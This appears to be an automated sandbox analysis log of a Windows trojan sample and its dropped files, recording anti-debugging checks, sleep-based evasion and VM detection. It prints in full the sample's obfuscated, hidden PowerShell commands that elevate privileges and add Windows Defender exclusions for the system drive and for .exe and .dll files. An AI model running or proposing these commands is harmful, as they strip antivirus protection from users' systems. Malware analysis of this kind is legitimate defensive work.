Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe TID: 7008Thread sleep count: 56 > 30Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe TID: 7008Thread sleep time: -56000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5016Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020Thread sleep count: 8969 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6952Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exe TID: 6536Thread sleep count: 35 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exe TID: 6536Thread sleep time: -35000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1572Thread sleep count: 9360 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1668Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exe TID: 5828Thread sleep count: 33 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exe TID: 5828Thread sleep time: -33000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5516Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788Thread sleep count: 7928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6191Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8969Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2381Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9360Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2973
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000A.00000002.421024303.00000280F50A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9C5754 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF62C9C5754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\MonDisc.exeSystem information queried: KernelDebuggerInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C9C5754 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF62C9C5754
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C9C5754 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FF62C9C5754

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
